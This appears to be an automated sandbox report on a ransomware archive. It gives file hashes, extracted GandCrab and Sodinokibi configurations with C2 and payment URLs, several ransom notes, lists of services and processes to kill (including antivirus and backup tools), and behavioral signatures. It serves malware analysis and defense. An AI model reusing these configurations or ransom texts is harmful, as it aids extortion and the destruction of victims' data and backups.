Analysis

  • max time kernel
    139s
  • max time network
    247s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-11-2024 21:52

General

  • Target

    RNSM00374.7z

  • Size

    7.7MB

  • MD5

    c63f53079f272724aeac535366e879cb

  • SHA1

    948e3d55280499eeb6c265f63a8bc7b9dc12ffed

  • SHA256

    46556d30b37cd555be08b1de8e585f8f8d86322efeb1e2ed14d88a905b04d73b

  • SHA512

    2f6c6175a7d6a4453e56a9a440224c2237c3755f279d91aecf2cf7062dae4e282a401192d2d6f4a444ab48b8eb1ec701d38f74a755be63159edb4dd21e02778f

  • SSDEEP

    196608:M4nmnYeVX/6F3PsG9oBdaeBIYfQ+PqLDq47eOs17:pc+3PsG+6CPqiJ/

Malware Config

Extracted

Family

gandcrab

C2

http://gdcbghvjyqy7jclk.onion.top/

Extracted

Family

sodinokibi

Botnet

28

Campaign

1356

Decoy

alwaysdc.com

lgiwines.com

housesofwa.com

circuit-diagramz.com

efficiencyconsulting.es

startuplive.org

parksideseniorliving.net

phukienbepthanhdat.com

mahikuchen.com

motocrossplace.co.uk

thegetawaycollective.com

ruggestar.ch

raeoflightmusic.com

pro-gamer.pl

boloria.de

drnelsonpediatrics.com

piestar.com

karelinjames.com

supercarhire.co.uk

hom-frisor.dk

Attributes
  • net

    true

  • pid

    28

  • prc

    winword

    tbirdconfig

    mydesktopservice

    agntsvc

    steam

    wordpa

    mydesktopqos

    ocssd

    thunderbird

    excel

    dbsnmp

    xfssvccon

    sql

    isqlplussvc

    sqbcoreservice

    ocautoupds

    msaccess

    powerpnt

    infopath

    ocomm

    mspub

    synctime

    thebat

    onenote

    firefox

    outlook

    visio

    dbeng50

    oracle

    encsvc

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-wannadie.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    1356

  • svc

    memtas

    mepocs

    sophos

    veeam

    backup

    svc$

    vss

    sql

Extracted

Family

sodinokibi

Botnet

19

Campaign

312

Decoy

breakluckrecords.com

peninggibadan.co.id

acibademmobil.com.tr

ninjaki.com

mieleshopping.it

modamarfil.com

activeterroristwarningcompany.com

slideevents.be

ygallerysalonsoho.com:443

ddmgen.com

forskolinslimeffect.net

deziplan.ru

solutionshosting.co.uk

smartspeak.com

humanviruses.org

avis.mantova.it

nxtstg.org

craftingalegacy.com

2020hindsight.info

hospitalitytrainingsolutions.co.uk

Attributes
  • net

    true

  • pid

    19

  • prc

    sqlservr

    mysqld_opt

    agntsvc

    excel

    synctime

    tbirdconfig

    mydesktopservice

    isqlplussvc

    msaccess

    visio

    thebat64

    dbsnmp

    mysqld_nt

    infopath

    winword

    sqbcoreservice

    ocssd

    sqlbrowser

    wordpad

    mydesktopqos

    oracle

    msftesql

    thunderbird

    encsvc

    steam

    ocomm

    thebat

    ocautoupds

    sqlwriter

    xfssvccon

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    312

  • svc

    svc$

    memtas

    sophos

    veeam

    vss

    mepocs

    backup

    sql

Extracted

Family

sodinokibi

Botnet

19

Campaign

96

Decoy

speiserei-hannover.de

delegationhub.com

subyard.com

martha-frets-ceramics.nl

hostastay.com

luvbec.com

dayenne-styling.nl

111firstdelray.com

lidkopingsnytt.nu

fbmagazine.ru

peppergreenfarmcatering.com.au

ya-elka.ru

mundo-pieces-auto.fr

mediabolmong.com

yuanshenghotel.com

fidelitytitleoregon.com

penumbuhrambutkeiskei.com

2020hindsight.info

aslog.fr

teethinadaydentalimplants.com

Attributes
  • net

    true

  • pid

    19

  • prc

    tbirdconfig

    onenote

    sqlbrowser

    firefoxconfig

    ocautoupds

    ocssd

    thebat

    winword

    mspub

    dbeng50

    steam

    sqlwriter

    sqlservr

    msftesql

    encsvc

    infopath

    mysqld_nt

    sqlagent

    mydesktopqos

    synctime

    wordpad

    powerpnt

    outlook

    dbsnmp

    isqlplussvc

    ocomm

    sqbcoreservice

    oracle

    thunderbird

    xfssvccon

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

  • sub

    96

  • svc

    veeam

    backup

    sql

    mepocs

    sophos

    svc$

    vss

    memtas

Extracted

Path

C:\Recovery\qh600s-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion qh600s. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/CA0FA58F67666807 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: tZvVd73KG0w112/thAhcB7GowUICnD5+RQ1mmDXC+qsQ0ruMcg8/NV9vxL3fT9UA 1HlF18bcs1DURjJs1O8NbBqV6Stavo3FxFrQvokBV89Fe+GFL6ZBhUBopWevuP3K S7aa8j6PGu2ZDGKo0l/OEK8650WGUaYJXba9LlcPO37UxilLdAxFIu6aTVGMYk63 eD2hqX9FtZoPXF1kb5q6dwqkdfS+FrLaVLRjxqp/e6JiTZO2JA9bjDuy09XSijq3 1OOOl6BwyQvacF3ajgDp16gQh0ZmIV3A15k9G8txoe8RFZchxSmNWZ451t+8OuTH J01cgPtc3qve2XdLXqxdarp2QqygntMLcoxWtc8nho8pkHkge+9I3kB79hlbOqcR 9YeOIlSRKYwSd0mtdXoc6whC+vi/k94VCY91TaXgiqCFBqPVoyBnNXWEqCQLNPnY MCKILD3+RCyYJvuIAicNVPUh3G4pugcoczssyoIFgZGMkPadA68edSsNVqcqlwCU jLCg6XYTdqKaxcQp+VXzdT9N71SgNpZnJFn3QIYRyGfSskWw3tiiC+WL6FX4+gHn Jn07274eXiDTBpadHyNBURFiU4Tm7nEiCVdxlb92Mnk+8dNIOPHl47WqaorbCyjc S0zhgvYcDrASJ7DiLhwGXFwgt8zrjnhK6h6Xnpvyhrp+B/JZEhYbsaEnQNSE15Vw gZGvHA8S9giouChsKa20sWZzxV4iA96P/nP0pze5hKt4xENZZKjdAKtdEVbukNP1 FdjaBKG/4feuSxoAqgpNUYVmUUzb0XJpBLjYSH/+XipqYapccu/mdIQpsMLO7ayy pELpxMfC5f7itPye6FuoxcLPM91XfDjHLK1lKdlQBik5arylS3a9rhhY4f+SFG2h mfFGvKlJufqaKztRdyoASzbIEGRLetObSk4tY10JBhM4vtcw3qsNHvhEFfuKgKJh SW6rv+GXr3bMoNAc3hbDOk1g4N3ECNxW9hq1P8/IL0Titb9uP1U46VhYmaDU9l/r MzZy0HqHeWNyNlnP0DGJLRuWMuECrgq8BxLaC2RUoF6KQuRuto1XFYH4biU7qWNo oL0Ug/UGNRf5EtV3PPx9BXO6D6R5u0J96uI/ijNs2DEvU5rXEFbWJWdlw101b7qx ZC09JuYwskRBL5Cxr7JZJ89hHM1K6kPwojP6z5vUhgyP5qCp4gaeozrrMwlFGOlK NEZ3nqIITmlwInZWCk4xbw== Extension name: qh600s ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807

http://decryptor.top/CA0FA58F67666807

Extracted

Path

C:\Users\0200u43-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 0200u43. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/CA0FA58F67666807 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: AJjng44cVylqMUCxL33IgCC1MftFsKpCCmxnKsOuh/N82TYwV+/87Jp+5iHbKnB/ vUktpK47qBisq7Pg5aZk9jRzZ6j5LOXsixTTRLLkB5JvMik5ifqBNntFBqvcRvg8 LH6+vHTSWLCey0BcXqfnP8o+UHktIkrZrolucpGyGQz2Kbi5oxglhi2Tz9KF4pHe zpEE0SJuef/4A+9zlKjsUuNt4ModLRK337Qzz9T4a/UPW3SBIG/4ZCimyQlQqqXO v/lU67+NNFBE2OUDfEAqy9Hv+TFRdSHhvqejfZDCK6GXTdDJaLj44bMTlVarYr7E bhzIzzA08pvHjop9NQxtnVeFs0E9QOFGk+Mn7l4/lQih1xi/zIBL2lovW0Dm+8vw rDCQkure2WMjCtYGG1ztpxK4GZAIcWPB6d74BZaH6WvffEL0GYC1UkVcdeMCRbhy gXGL8ZsXnT9LAaAOsyJn3QvmfduG0v8pmbeKdqWQfx8S+crL5twIUpz1qlBxmbl5 YOSUM5M7n0P9PpDqCSLFQApw+UYJonjw33gMDzFK+EzC4JnnpxqGuZtnLo7GSrkC fHl7piJBPaIz9BGpjjZXh/BsGmWoPLbzKuyumMLyK7KDRLSeuKCMpRYg7Fn1bdwO GRMz9wJFRntFnvbEH8F/ox/dTN+mb5AMya76uJhRtm1MVvgHNP4G9Eoq940vKRPu cdlMhAOtN0vf7YSWu5e9PMZS81/6cmM/j4RjzCPP1v+VFDUruaV/VCqF/hNvUUMP NLoB/ChYIowdaG/dG34EZWkrkdUlLX1mMSs/D1qErbUsupQGhk1lmBx3OHW94I7Z OwGCjuvY6r4Dgpgs37ExkXtzW3f7kefcEPe80AUngolckBmUY20jxtjzzD45rfkR 5u9ITktM+EIWY1Ou5eQeqSthByVMO1rXySz9hagw0Ekofea3Z1ZcjLYhetBciQvY 3gHrjqaXvI+dZTYeysvkTCW1+FrcG5LHPG8o8bPuTcSCJzhmbDnc5/45vo/AR+RA T4aVGlH1K4Rn/iq9f0w48NCEXnIAA2Ybgn2I2wSPpLBkhwjjEt+nXUhhs+1rRglk hk4EgeMu9Rq/VE+e5oK6QYYsjwJcX8VjI+Y6z3zkEluuswRjWp6ihBkZqveAVXqh w59yvltXm8xjbowmMqN5T8SZOF7WQLT1CSYkNz6tvevfVT30OfOB7Q5GkgVego4E RxgHqBkpF3Lwgu8dGin6hA== Extension name: 0200u43 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807

http://decryptor.top/CA0FA58F67666807

Extracted

Path

C:\Users\m5r5p-wannadie.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension m5r5p. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/CA0FA58F67666807 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: xwWVW2QMakYTBSbbXStiUJOPNdQvl0fBTTpF6eI0dKisRvcC5gwAN4O+mhSZdF0k WR/LbY7in//uirOpblMLDIK2Z3K7MEOAcaRKG58Ww3n0cpHBpzFu957RfTIfrtl0 BhdOCZm+IVwLXGngi/rAr215z9je4jzYx6BteTM8ir24qVkmaElHlVrU298tZ1e8 2B3mYgCkWCuQPMsJ/Z8ac6ZtIv86QeQ0NEMalsiZLv7HvqpIK/xRw6eWmikAeeGf 8UNDMVl5O/H5MJg4KnloeXkQw4f9YIgbDPSIOvafzBJEOO33zFMg8q54InjGoXuF tbnkTs6bLj99xY4LbbYRvn7KW7IHqcrW7D3kqyLXvFh5gyG7P+tOY0ACLu2PR/W9 cqBeCFAA4yT/QHki6RjsBka91OnnItkKobJLnMKPb9IO9rHjeC1oj8CCIAdzh9Wf F1ZLhrx55d5X4A+2vtBGld7otJg+J+l5YFr/0FDVzZuuQ5iJauKzv7M2cjnHu/As qWMb72WgUS13Wifb6Tkg3C4kOwawrkv+rO6HoWx6obv1/5IWDpzNkayAtorsIRfv EWuDYbH731aUDvNZHbaZuEQbmE2lqfpIWt4kNPq/Slp8iWvDzi2U7ehhVuQpWyc/ u34Pjbc6dG3ItjMIjXk2enTX3f5g/+OfuRfRCvsrQzlqoamFXaXjUeShEu53/Zf5 VBGI2nxuVIZx2pDdHcV102Lxi4jZymtptYUl6pwo7mQE76YJ57zv7eWyCKhAnwYl mHYO16fcENxbHvqbBiyLTNyLGALFjc2O/sNkhWC+ZdZTZVKNGzw3k+SPoKIrQ946 vco/Wm2AOLgXemn6h8u39OZx1VSF+DO6ZmdujTW9Ju+2saKYTEhlbk2/T8Ue7W9k /jPIBzaa5yn8YjTTSm4+mT5mh9LvBFUXyLFNgAL9pDkhm/+s+YfQME7EP4u8pbDp tIXB3ZA/WiONG3PLIGkbpQcivwbDGMmWadnDMMtWHRaRegtt2Jgo71AvwM0aF4nu G0hG9aAsMRfXH0eogVXeXc1d0/BWbOTjnuZzr+ZDbIpplLUoJfzYDhY0z6GHHWiX x49QexJW6jOgUoJppW4fv2rO++yP1/zXF+0cT+I0ye+1TZoWmm2wHKOIUAZcngda jQJBp1UDgMzv7HgP/aT41OPeDBmgS/uof0eD3wSE0/NjQy/PRvNM5+GLC1pDxOjC +eNrxR7dl2VhUsuBqN+Diw== Extension name: m5r5p ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807

http://decryptor.top/CA0FA58F67666807

Extracted

Path

C:\Users\04d6g7u0-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 04d6g7u0. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/CA0FA58F67666807 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: leXOb7qbKxbuGxXw0aSywfKVcZoWaRCCmDfDnj8HOJxCbcExjI3GdFzo3j470rhn pF4Sem9LqesPW/aBcWn0U8MKqsN93mY7SjugA/PP2Q8EiiOh2IVT5FfgFxvWVW9t 2tMuXCn+Zejpo3qTf5NVHvUbuXP40jCmd44RXupcRUbPqNIE+gX+6cuIObhLZuk5 8NFBk1C88aubHOr5YoJz0muip4lmlUr5Pj6Z+cplh8S4hQnSW+7zRIOuEHTnd5hU Uhlr6GqwGhKu1ZuA2KuJ6Ywrn5EeiaB79WUupR53pFu6daFom/AKaeeS401Mit0d vcCNZ4LaLuqGVVBunzd6HegTik4cbDIf/tQv95QorTwEIyJGmu3Ck7xONeV33wSu TL1NSIL1Cer7Mj8OjeN4lDx8XTcWVlEZSUwkyi1YPc2wxdzFDKWtK4HrkHMMCn62 8n6u5fPxGbrUfi1GhCaK1XH/M/ZfCgTcnylRAvJCfPxpBbPkfxZXzLdFwrvpk4hU wpBsdlzCIa/fB1fqBz4Ag84v7FqAfTv5mtGC68aHiFG0bgnUY7z7JEkeoFSkXKoO l4OCHSOYFHDfkLT1LLjtYZ+XfQnt1RYqzALEWyKYUBC+8yOstCeeQw/hYicHK6QR 5aIAHEp29gyPDRob4i36DuVoWz+n54FJiZB6g28NGPohroerJtZ75j6iavK8xQgD UpSRG9QPg0r52fjqbhoVnw/FZcvMiuhp/xD+E8JFp3FqJqJGQ2RB69iGwKdERTXk UnkU/n5LdgfxoM5YiQPb9dJtUhHTzM7EyEN6jWVZcnQbCYVS7HFSjIIR2Fnt5B4X SU48fm/KT9nvakmZgAFEGY38X78scAvd2n3OPr3u9gVNfHkGI3SSvM3GFGIoUfkE 4FNaOZ8l5QWESAxOyYZunZfhK0/f6ZXu28BLTeuwehuVYA2WOMQQZMJnaho6pLUM fNXYG7nrExlTiZTUuKqcsmmAuz2dLHlxYoD3CAXhgUyVB8PIw+j4KvNb3vJsCG5B 9jxzt5EpLk8OBt8a1Wrl30ouIh/dDay8MoxuyeDJ8wBG0OQf3THCGSDA2gdmFFDI iNn8MshAzdAYOD4arOMxU4aYB3qjZ7xgKc4bjb8J4j5LRtGzdLAtHKu2ZlypcnAt NAdgPGYAd1Ux/+9hxsKLcQFrBCFPNgemPOxSg3Qm517TDVPKpFwVqdXrtsLeu5xw lRntn8TlXvGmlH6IJYQ63nI/tDw= Extension name: 04d6g7u0 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA0FA58F67666807

http://decryptor.top/CA0FA58F67666807

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Agenttesla family
  • Dharma

    Dharma is a ransomware that uses security software installation to hide malicious activities.

  • Dharma family
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Emotet family
  • GandCrab payload 1 IoCs
  • Gandcrab

    Gandcrab is a Trojan horse that encrypts files on a computer.

  • Gandcrab family
  • Jigsaw Ransomware

    Ransomware family first created in 2016. Named based on wallpaper set after infection in the early versions.

  • Jigsaw family
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Sodinokibi family
  • Sodinokibi/Revil sample 2 IoCs
  • Troldesh family
  • Troldesh, Shade, Encoder.858

    Troldesh is a ransomware spread by malspam.

  • AgentTesla payload 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (190) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (513) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Downloads MZ/PE file
  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Drops startup file 17 IoCs
  • Executes dropped EXE 43 IoCs
  • Loads dropped DLL 18 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 11 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 64 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 14 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 10 IoCs
  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 17 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 5 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Time Discovery 1 TTPs 1 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 56 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 12 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • NTFS ADS 6 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

